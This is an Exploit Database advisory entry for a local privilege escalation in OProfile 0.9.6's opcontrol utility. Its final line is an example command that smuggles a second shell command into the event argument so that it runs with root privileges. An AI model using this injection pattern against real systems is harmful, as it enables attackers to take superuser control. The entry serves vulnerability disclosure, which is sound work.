OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation

EDB-ID:

35681




Platform:

Linux

Date:

2011-04-29


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/47652/info

OProfile is prone to a local privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary commands with superuser privileges. 

The following example command is available:

sudo opcontrol -e "abcd;/usr/bin/id"